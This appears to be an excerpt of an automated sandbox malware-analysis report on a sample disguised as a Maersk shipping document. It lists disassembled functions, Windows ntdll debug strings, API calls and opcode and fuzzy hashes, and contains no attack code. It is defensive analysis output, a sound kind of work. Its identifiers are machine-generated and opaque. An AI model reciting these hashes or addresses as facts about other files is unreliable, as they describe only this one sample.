                                                    • Instruction Fuzzy Hash: C8E06D712002047BC610EE49DC42F9B37ACEFC5714F004419F908A7341D674B9108AB8
                                                    Function 0042CCE3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 419 42cce3-42cd1f call 404643 call 42db53 ExitProcess
                                                    APIs
                                                    • ExitProcess.KERNEL32(?,00000000,00000000,?,9A0A6B39,?,?,9A0A6B39), ref: 0042CD1A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: ff46c3749a6ab0d7dff1e82a35f795f13fa1c0c29bc4e148dcdef1bc45769d99
                                                    • Instruction ID: db584931667c167d052b57122e12c945e868705e8a3680be29b3f7ccc7343bef
                                                    • Opcode Fuzzy Hash: ff46c3749a6ab0d7dff1e82a35f795f13fa1c0c29bc4e148dcdef1bc45769d99
                                                    • Instruction Fuzzy Hash: 49E04F356442147BC610AA5ADC01F9B775CEBC5754F414419FA0CA7241D675791187E4
                                                    Function 017E2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 424 17e2c0a-17e2c0f 425 17e2c1f-17e2c26 LdrInitializeThunk 424->425 426 17e2c11-17e2c18 424->426
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 1fdcfefc7d0969e85db29157ef8824090cb33c9324354dd062cd74acd2e58627
                                                    • Instruction ID: e459c39f64e16b2b85943c9682b89611a3127dd16eed8a43c9003c9788d0d412
                                                    • Opcode Fuzzy Hash: 1fdcfefc7d0969e85db29157ef8824090cb33c9324354dd062cd74acd2e58627
                                                    • Instruction Fuzzy Hash: B2B09B719055C5C5DF11E764460C717B954B7D5701F15C075D3030652F4738C1E5E276

                                                    Non-executed Functions

                                                    Function 01822349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-2160512332
                                                    • Opcode ID: 3370b0c79cc6af109aebda36bf76147de2f193e5f961144e6cfe0a32d319c95e
                                                    • Instruction ID: 8af1926595144e664719099c543d6239645a31c6f83af2fda7198fb7c8928c53
                                                    • Opcode Fuzzy Hash: 3370b0c79cc6af109aebda36bf76147de2f193e5f961144e6cfe0a32d319c95e
                                                    • Instruction Fuzzy Hash: 5B92E371604352AFE722CF28C884F6BB7E9BB88714F04492DFA94D7251D770EA84CB52
                                                    Function 017D8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • corrupted critical section, xrefs: 018154C2
                                                    • undeleted critical section in freed memory, xrefs: 0181542B
                                                    • Critical section address., xrefs: 01815502
                                                    • 8, xrefs: 018152E3
                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 01815543
                                                    • Thread identifier, xrefs: 0181553A
                                                    • Critical section debug info address, xrefs: 0181541F, 0181552E
                                                    • Critical section address, xrefs: 01815425, 018154BC, 01815534
                                                    • double initialized or corrupted critical section, xrefs: 01815508
                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018154E2
                                                    • Address of the debug info found in the active list., xrefs: 018154AE, 018154FA
                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018154CE
                                                    • Invalid debug info address of this critical section, xrefs: 018154B6
                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0181540A, 01815496, 01815519
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                    • API String ID: 0-2368682639
                                                    • Opcode ID: a64d938aae27370ced7129eb08e7b3357543e7c48eb416baa0db35d11cd753cd
                                                    • Instruction ID: db0cd0de0ea2dabeb252157a6494e28ae737315525ad82744414c8c8d37dbc90
                                                    • Opcode Fuzzy Hash: a64d938aae27370ced7129eb08e7b3357543e7c48eb416baa0db35d11cd753cd
                                                    • Instruction Fuzzy Hash: 8581ADB2A80348EFDB20CF99C854BAEFBB9BB49714F544119F504F7685D371AA40CB91
                                                    Function 017D29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018122E4
                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018124C0
                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01812412
                                                    • @, xrefs: 0181259B
                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018125EB
                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01812409
                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01812498
                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01812602
                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01812506
                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01812624
                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 0181261F
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                    • API String ID: 0-4009184096
                                                    • Opcode ID: 159438d2c73410483c86874a606c57efd151670b0af3099b3fcd80cf20afff51
                                                    • Instruction ID: 0bff5b4e52c41f9f11f252153d8381a95195ca85b7903b323f6f691ad1b6a74a
                                                    • Opcode Fuzzy Hash: 159438d2c73410483c86874a606c57efd151670b0af3099b3fcd80cf20afff51
                                                    • Instruction Fuzzy Hash: 38026EF2D002299BDB21DB54CC84BDAF7B8AB54704F1041DAE60DA7246EB709F85CF59
                                                    Function 01848B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                    • API String ID: 0-2515994595
                                                    • Opcode ID: 6e5f8f03f5957edf70b373030a5b55bddc7efbf5a7d230236879ddfaaf0042e4
                                                    • Instruction ID: 5b11e349eb1539affaa253d6224e38101eef20c4b79da48520774aef80490471
                                                    • Opcode Fuzzy Hash: 6e5f8f03f5957edf70b373030a5b55bddc7efbf5a7d230236879ddfaaf0042e4
                                                    • Instruction Fuzzy Hash: 1851CEB15093099BC729DF58C848BABBBE8EF95344F14492DE999C3241EB70D604CB96
                                                    Function 01850274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                    • API String ID: 0-1700792311
                                                    • Opcode ID: 16eef42e35897a9cfe0ed727799daf385c67720d2541158dda97b48029461310
                                                    • Instruction ID: 1409db73d74ced25fe829667a40be196cfba52db31bbbf0763e4cd3842ae7b6d
                                                    • Opcode Fuzzy Hash: 16eef42e35897a9cfe0ed727799daf385c67720d2541158dda97b48029461310
                                                    • Instruction Fuzzy Hash: DDD1CA7150068AEFDB62DF68D494AAEFBF1FF49718F088049F8459B312C7349A85CB10
                                                    Function 018289B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01828A3D
                                                    • HandleTraces, xrefs: 01828C8F
                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01828A67
                                                    • VerifierDebug, xrefs: 01828CA5
                                                    • VerifierFlags, xrefs: 01828C50
                                                    • VerifierDlls, xrefs: 01828CBD
                                                    • AVRF: -*- final list of providers -*- , xrefs: 01828B8F
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                    • API String ID: 0-3223716464
                                                    • Opcode ID: 3cdba77b6551707215038fd198ff2c64ac01dc10ade1584a87f916c71cf5ae2a
                                                    • Instruction ID: 29775bbd1fe31c951cd8018c090955bd3ee2bcce6d09112f024b4ac44e676da0
                                                    • Opcode Fuzzy Hash: 3cdba77b6551707215038fd198ff2c64ac01dc10ade1584a87f916c71cf5ae2a
                                                    • Instruction Fuzzy Hash: FF914871A453269FEB23DF68C880B1AB7E4AB56B14F09045DFA41EB241C7709B84CB91
                                                    Function 017AEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                    • API String ID: 0-1109411897
                                                    • Opcode ID: 3f1dde68de39c76be59161bcd304b477d2e5027aad8928fac2069f9d60fa57f3
                                                    • Instruction ID: 34346c81525637b59a0d8f946af4884f9f2eff56466dc3f9fca8a4001475ddfd
                                                    • Opcode Fuzzy Hash: 3f1dde68de39c76be59161bcd304b477d2e5027aad8928fac2069f9d60fa57f3
                                                    • Instruction Fuzzy Hash: A6A23B74A0562A8FDB65DF18CC887ADFBB5AF85304F5442E9D90DA7290DB309E85CF40
                                                    Function 017D63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-792281065
                                                    • Opcode ID: 79361569d3b3ec22c7c746b0cc041bcdf7b86f73da55cc01b31e9fa18623a4c0
                                                    • Instruction ID: 364d9d1f0641d17039d6551c71febc1b4acacf259418f9ecdf1ff633e49260e3
                                                    • Opcode Fuzzy Hash: 79361569d3b3ec22c7c746b0cc041bcdf7b86f73da55cc01b31e9fa18623a4c0
                                                    • Instruction Fuzzy Hash: 8A915C71B403159BEB35DF58D848BAEBBB5BB40B24F180129FA01A7289D7744B41CBD1
                                                    Function 0179645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • apphelp.dll, xrefs: 01796496
                                                    • LdrpInitShimEngine, xrefs: 017F99F4, 017F9A07, 017F9A30
                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017F9A2A
                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017F99ED
                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 017F9A01
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 017F9A11, 017F9A3A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-204845295
                                                    • Opcode ID: 8df74b2bb7350d07e0666e991c4b7db117afc9424b8afa64b7fcbcf70c94a6f9
                                                    • Instruction ID: 2b4994b7621936471a9f91e32675e67dc876b61253dac830753d33a829657812
                                                    • Opcode Fuzzy Hash: 8df74b2bb7350d07e0666e991c4b7db117afc9424b8afa64b7fcbcf70c94a6f9
                                                    • Instruction Fuzzy Hash: 5251B2712483019FEB25DF24D895B9BF7E4FF84748F14091DFA8597265E630EA08CB92
                                                    Function 017D2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01812180
                                                    • RtlGetAssemblyStorageRoot, xrefs: 01812160, 0181219A, 018121BA
                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018121BF
                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0181219F
                                                    • SXS: %s() passed the empty activation context, xrefs: 01812165
                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01812178
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                    • API String ID: 0-861424205
                                                    • Opcode ID: d632fb744078241de71e70ab12834ba7790d1c2dcc2582e67cfb70fbd03b1913
                                                    • Instruction ID: 2667dae5321faeaf1b90dbdbbd6d15954921ab9c0823a39e3cbbd7adae10a5df
                                                    • Opcode Fuzzy Hash: d632fb744078241de71e70ab12834ba7790d1c2dcc2582e67cfb70fbd03b1913
                                                    • Instruction Fuzzy Hash: ED313576F802297BEB21DA998C81F5AFB7DDF65B50F250059FB05EB105D270AB01C3A1
                                                    Function 017DC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • LdrpInitializeProcess, xrefs: 017DC6C4
                                                    • LdrpInitializeImportRedirection, xrefs: 01818177, 018181EB
                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01818181, 018181F5
                                                    • Loading import redirection DLL: '%wZ', xrefs: 01818170
                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 018181E5
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 017DC6C3
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                    • API String ID: 0-475462383
                                                    • Opcode ID: 5114eec50e239e8a8d000d00e07f69ebbe7895b0041cf688b994034da0d95559
                                                    • Instruction ID: f6997fc0e2f137ebe38b47aef82d6781814bd5dff79401570e42a0f2db679e18
                                                    • Opcode Fuzzy Hash: 5114eec50e239e8a8d000d00e07f69ebbe7895b0041cf688b994034da0d95559
                                                    • Instruction Fuzzy Hash: 5F3117B26443469FC215EF2CDC4AE1AF7E4EF94B10F04055CF9459B299E620EE04C7A2
                                                    Function 017E096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 017E2DF0: LdrInitializeThunk.NTDLL ref: 017E2DFA
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0BA3
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0BB6
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0D60
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0D74
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                    • String ID:
                                                    • API String ID: 1404860816-0
                                                    • Opcode ID: f9463549ef92185ede80c7e1df5c0b32f7e8da2fde19c92428392fcfb1208496
                                                    • Instruction ID: 77b3c1892c847f0c2f12c6844d2774c1c80d72de7009a155def703c35c1fd953
                                                    • Opcode Fuzzy Hash: f9463549ef92185ede80c7e1df5c0b32f7e8da2fde19c92428392fcfb1208496
                                                    • Instruction Fuzzy Hash: FE426D72A00715DFDB21CF28C894BAAB7F9FF08314F1445A9E989DB245D770AA84CF60
                                                    Function 017AA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                    • API String ID: 0-379654539
                                                    • Opcode ID: 660de2818804d0e3a2fc607099bd89a6cff5c22638d1e4c8c5f6551bc2a501c5
                                                    • Instruction ID: 54aaf231e38e0a351435c35b25a278ac7f5225bba743e9fb5c22e4c504b0a20f
                                                    • Opcode Fuzzy Hash: 660de2818804d0e3a2fc607099bd89a6cff5c22638d1e4c8c5f6551bc2a501c5
                                                    • Instruction Fuzzy Hash: 5EC18970108386CFD722CF58C444B6ABBE4BF84704F448A6AF995CB291E774CA49CB56
                                                    Function 017D8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • LdrpInitializeProcess, xrefs: 017D8422
                                                    • @, xrefs: 017D8591
                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017D855E
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 017D8421
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-1918872054
                                                    • Opcode ID: 4805b29094f017f8da28ad4f86105c0e526c04478e92e3d4ffd261c9fdbad546
                                                    • Instruction ID: 6ec6246460fb5a6fada40ab8b3c37fde6894f4bf332429c5d9b9a835b9bc28bb
                                                    • Opcode Fuzzy Hash: 4805b29094f017f8da28ad4f86105c0e526c04478e92e3d4ffd261c9fdbad546
                                                    • Instruction Fuzzy Hash: 59917D71508349AFDB22DF65CC44FABFAECBB88744F84092EF685D6155E370DA048B62
                                                    Function 017D273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018122B6
                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018121D9, 018122B1
                                                    • SXS: %s() passed the empty activation context, xrefs: 018121DE
                                                    • .Local, xrefs: 017D28D8
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                    • API String ID: 0-1239276146
                                                    • Opcode ID: 91c28e2e759cda5b569ba2a1f752b4a323173bd178abedf8e0d12165edb6ee21
                                                    • Instruction ID: 4f97195c9fc8651cebf8d861fe21d884024ee1c5286d67f284f5674370681cf4
                                                    • Opcode Fuzzy Hash: 91c28e2e759cda5b569ba2a1f752b4a323173bd178abedf8e0d12165edb6ee21
                                                    • Instruction Fuzzy Hash: E6A1C03194122DDFDB25CF68C888BA9F7B5BF58314F2401E9D908AB256D7309E81CF90
                                                    Function 017D4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RtlDeactivateActivationContext, xrefs: 01813425, 01813432, 01813451
                                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01813456
                                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0181342A
                                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01813437
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                    • API String ID: 0-1245972979
                                                    • Opcode ID: 44fe8e271359f3b9e23f213a9400fa490d375886f7bdef555ccbd332825eb700
                                                    • Instruction ID: f827aaa253511f07f5cc9b38aaee6bba9dc7ff6af19dcea924307b7d8ac94e08
                                                    • Opcode Fuzzy Hash: 44fe8e271359f3b9e23f213a9400fa490d375886f7bdef555ccbd332825eb700
                                                    • Instruction Fuzzy Hash: 176124726807169BD722CF1CC881B2AF7F5BFA4B20F148519E95ADB644D730E941CB91
                                                    Function 017A64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01800FE5
                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018010AE
                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0180106B
                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01801028
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                    • API String ID: 0-1468400865
                                                    • Opcode ID: 42431324ea6695420e2989135e2151e483dcb75beaba0c8c0168d8be2ec0a473
                                                    • Instruction ID: 7c2dfa66eff94d1b5470e780fa78d6fbd5856dd6ffbe67510d604925c53b3877
